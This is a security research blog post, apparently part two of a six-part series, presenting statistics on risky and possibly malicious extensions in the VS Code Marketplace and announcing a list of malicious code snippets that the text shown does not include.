2/6 | Exposing Malicious Extensions: Shocking Statistics from the VS Code Marketplace
In the previous blog post “1/6 | How We Hacked Multi-Billion Dollar Companies in 30 Minutes Using a Fake VSCode Extension”, we told the story of how within 30 minutes of work we created a Visual Studio Code extension which was later confirmed to be installed inside multiple multi-billion dollar market cap companies, including one of the biggest security companies in the world, and in a certain country’s justice court network.
Realizing the significance of our experiment, we decided to dive deeper into the current state of malicious extensions in the VSCode marketplace.
Visual Studio Code Marketplace Stats
Lets get some basics out of the way, the VSCode Marketplace hosts around ~60,000 extensions from ~45,000 different publishers where only 1,800 of them are verified (We’ll touch on this later).
While the marketplace hosts 60,000 extensions it has a total of 3.3 billion installs with the average developer installing 40 extensions in his IDE.
Of the 60,000 extensions the average install count per extension is ~55,000 installs while the median only sits at 500 installs.
In the last year alone (2023) the VSCode marketplace grew by 25% in the number of extensions it hosts.
While these stats are overall great for Microsoft they are a worry for organizations as the popularity of extensions is growing massively and the growing number of extensions is presenting more and more opportunities for threat actors to assimilate themselves amongst the crowd and infiltrate organizations.
So, Visual Studio Code is growing and is virtually everywhere, but why is it a security risk?
Visual Studio Code is the first IDE (Integrated Development Environment) that adopted the “bare-bones compose your own IDE” approach. It introduced a world where instead of offering a massive feature-heavy IDE which tries to solve all the problems for all developers, VSCode would be a platform, which anyone can extend allowing the developer to pick and choose the tools he needs to complete his work. This new approach was a huge success, quickly surpassing the then-market leader Jetbrains in monthly active users.
By nature this meant that Microsoft needed to create a marketplace where fellow developers can share tools they use to make their work more efficient, the VSCode marketplace, and this is where security risks enter the picture.
The IDE is one of the most sensitive security chokepoints in organizations, having access to the organizational codebase, version control, and often secrets and keys to the production environment. Not only that but often IDEs are highly privileged as they execute code and actions on the host machine that require admin level permissions.
By installing an extension, this in turn means giving the extension publisher full access to the host environment.
Extensions in Visual Studio Code are not sandboxed, they can access anything inside the IDE and can execute anything on the host machine without the developer getting any feedback. I talk about these issues more in depth in the next blog post in the series linked below.
Alright, enough details and background, what did we find?
Allow me to introduce you the wonderful world of malicious and highly risky extensions we found which are currently (Jun, 2024) hosted on the VSCode marketplace.
Lets talk numbers, in our initial research we found —
1,283 extensions that include known malicious dependencies packaged in them with a combined total of 229 million installs (Based on Google OSV Scanner).
87 extensions that attempt to read /etc/passwd file on the host system.
8161 extensions that communicate with a hardcoded IP address from JS code.
1,452 extensions that run an unknown executable binary or DLL on the host machine.
267 extensions have verified hardcoded secrets embedded in them.
145 extensions’ code and resources were flagged with high confidence by VirusTotal.
2,304 that are using another publisher’s Github repo as their official listed repository implying copycat extensions.
Got a shiny new AI policy in your organization? 783 extensions were found to use third-party AI models as part of their functionality.
Edit for clarification: It is important to mention that none of these indicators guarantee that the extensions are malicious, infact they most likely are not. But these indicators are here to help show organizations what they are facing. Each organization may tweak and choose their own risk appetite as to these numbers and indicators and decide what is right for themselves. We have no goal of calling innocent extensions malicious or the other way around.
Even if the actual number of malicious extensions is only 5% of our initial numbers we are in really bad shape. Not mentioning that highly risky extensions, but not yet malicious, is also a big risk for organizations as malicious code can always be introduced due to the security design flaws I mention in the next blog post. And there is much more, I’ve attached amazing code snippets that we found during our research of malicious and risky extensions at the end of the blog post, they have all been reported to Microsoft.
As you can tell by the numbers, there are plethora of extensions that pose risks to organizations on the Visual Studio Code marketplace. VSCode extensions are an abused and exposed attack vertical, with zero visibility, high impact, and high risk. This issue poses a direct threat to organizations and deserves the security community’s attention.
After completing this research and our experiment in the previous blog post, we decided to write a letter to Microsoft addressing the immense security design flaws in extensions and in the VSCode marketplace that enable this attack vertical. Our next blog post talking about the immensely flawed Marketplace is out now — “3/6 | A Letter to Microsoft: Uncovering Design Flaws of Visual Studio Code Extensions”.
Edit: We’ve released our free community tool to help solve this problem, checkout ExtensionTotal
Malicious and Risky Extensions Hall of Fame
Below are a few interesting malicious code snippets live (Jun 2024) on the VSCode marketplace we found during our research —
We will add more and update this list as we find clearly malicious extensions.
